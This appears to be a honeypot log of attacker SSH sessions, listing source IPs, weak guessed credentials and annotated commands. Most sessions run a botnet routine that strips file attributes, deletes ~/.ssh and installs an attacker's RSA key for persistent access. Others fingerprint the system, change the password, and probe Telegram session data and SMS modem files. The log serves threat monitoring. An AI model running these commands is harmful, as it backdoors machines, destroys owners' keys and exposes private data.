2026-04-05 14:39 EDT · as oracle/oracle4

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 rogue_root_37 (207.46.224.80) — Singapore, Singapore · 2 sessions · 2 cmds

2026-04-05 12:14 EDT · as root/1234, root/123456

OS/kernel identification → hostname discovery

$ uname -a

↳ OS/kernel identification

$ hostname

↳ hostname discovery

🎭 cipher_root_62 (150.5.129.10) — Hong Kong, Hong Kong · 1 session · 2 cmds

2026-04-05 10:44 EDT · as oracle/oracle28!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 tiger_root_2 (139.59.58.25) — Bengaluru, India · 2 sessions · 22 cmds

2026-04-04 08:04 EDT · as oracle/oracle28!, user/password

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "ssh-rsa" payload → cat /proc/cpuinfo | grep name | wc -l → echo "password\nPckB8UR1wZFU\nPckB8UR1wZFU"|passwd|bash → Enter

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "password\nPckB8UR1wZFU\nPckB8UR1wZFU"|passwd|bash

$ Enter new UNIX password:

$ echo "password\nPckB8UR1wZFU\nPckB8UR1wZFU\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 shadow_root_41 (38.19.156.18) — Miraflores, Peru · 1 session · 2 cmds

2026-04-05 09:02 EDT · as oracle/oracle07

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 phantom_root_38 (23.97.62.150) — Singapore, Singapore · 1 session · 1 cmd

2026-04-05 07:28 EDT · as root/123456

hostname discovery

$ hostname

↳ hostname discovery

🎭 phantom_root_39 (27.71.237.45) — Hanoi, Vietnam · 1 session · 2 cmds

2026-04-05 05:33 EDT · as oracle/oracle06!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 samba_root_4 (186.233.118.22) — Rio de Janeiro, Brazil · 1 session · 2 cmds

2026-04-05 05:14 EDT · as oracle/oracle06!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 rogue_root_38 (8.217.53.188) — Hong Kong, Hong Kong · 1 session · 1 cmd

2026-04-05 04:25 EDT · as root/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 panda_root_18 (218.78.46.81) — Shanghai, China · 1 session · 2 cmds

2026-04-05 03:39 EDT · as oracle/Oracle21

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 kimchi_db_2 (211.37.174.62) — Seongnam-si, South Korea · 1 session · 2 cmds

2026-04-05 03:38 EDT · as oracle/Oracle18!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 shadow_root_42 (43.128.66.35) — Singapore, Singapore · 2 sessions · 4 cmds

2026-04-04 23:00 EDT · as oracle/Oracle123456, oracle/oracle03!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 shadow_sol_7 (186.30.115.187) — Bogotá, Colombia · 1 session · 2 cmds

2026-04-04 22:41 EDT · as oracle/Welcome1

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 burger_root_9 (164.90.157.6) — Santa Clara, United States · 1 session · 2 cmds

2026-04-04 22:39 EDT · as oracle/Welcome1

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 liberty_root_15 (192.3.130.87) — Elk Grove Village, United States · 1 session · 2 cmds

2026-04-04 22:28 EDT · as oracle/Welcome1

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 dutch_root_8 (147.45.50.81) — Amsterdam, The Netherlands · 1 session · 2 cmds

2026-04-04 16:17 EDT · as oracle/oracle10!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 rogue_root_39 (83.118.24.18) — Chatuchak subdistrict, Thailand · 1 session · 2 cmds

2026-04-04 14:40 EDT · as oracle/Oracle26!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 phantom_root_40 (85.192.37.109) — Helsinki, Finland · 4 sessions · 4 cmds

2026-04-04 13:58 EDT · as deploy/deploy123, oracle/!QAZ@wsx, oracle/qwe123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×4

🎭 specter_root_4 (160.187.229.189) — Hanoi, Vietnam · 27 sessions · 27 cmds

2026-04-04 12:36 EDT · as admin/123456, admin/admin123, admin/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×27

🎭 seoul_root_10 (14.63.217.28) — Seongnam-si, South Korea · 1 session · 2 cmds

2026-04-04 13:58 EDT · as oracle/Oracle03!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 gouda_root_9 (212.87.220.74) — Dronten, Netherlands · 1 session · 2 cmds

2026-04-04 13:18 EDT · as oracle/Oracle10!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 ghost_sol (206.123.145.55) — Tirana, Albania · 1 session · 1 cmd

2026-04-04 11:04 EDT · as oracle/qazwsxedc2

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 shogun_root_2 (132.145.115.202) — Tokyo, Japan · 1 session · 1 cmd

2026-04-04 10:24 EDT · as postgres/postgres

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 ghost_root_68 (95.39.82.218) — Madrid, Spain · 1 session · 2 cmds

2026-04-04 09:46 EDT · as oracle/oracle!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 hanbok_root_7 (121.142.87.218) — Gimpo-si, South Korea · 1 session · 2 cmds

2026-04-04 09:14 EDT · as oracle/oracle24!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 seoul_root_11 (59.23.3.146) — Gumi, South Korea · 1 session · 1 cmd

2026-04-04 07:45 EDT · as pi/pi

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 cipher_root_63 (207.46.224.87) — Singapore, Singapore · 1 session · 1 cmd

2026-04-04 07:37 EDT · as root/123456

ssh

$ ssh -V

🎭 capoeira_root_7 (201.77.124.248) — Sumaré, Brazil · 1 session · 2 cmds

2026-04-04 07:26 EDT · as oracle/oracle26!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 panda_root_19 (115.120.86.156) — Shanghai, China · 1 session · 1 cmd

2026-04-04 06:19 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 ghost_root_17 (81.30.162.19) — Vinnytsia, Ukraine · 1 session · 2 cmds

2026-04-04 06:15 EDT · as oracle/oracle21!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 cipher_root_64 (45.10.175.246) — Chai Wan, Hong Kong · 2 sessions · 2 cmds

2026-04-04 04:51 EDT · as oracle/oracle, pi/raspberry

Ran uname 21x across 21 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×2

🎭 cowboy_root_14 (72.79.42.117) — Springfield, United States · 1 session · 2 cmds

2026-04-03 23:45 EDT · as oracle/oracle1@

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 fog_root_10 (87.106.35.227) — Worcester, United Kingdom · 1 session · 2 cmds

2026-04-03 23:08 EDT · as oracle/oracle11

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 maple_root (174.115.146.36) — Ottawa, Canada · 1 session · 1 cmd

2026-04-03 23:08 EDT · as oracle/oracle

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 bibimbap_root_4 (222.119.187.99) — Geumjeong-gu, South Korea · 1 session · 9 cmds

2026-04-03 22:09 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 lantern_root_22 (106.13.85.199) — Beijing, China · 1 session · 1 cmd

2026-04-03 19:40 EDT · as mysql/mysql

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

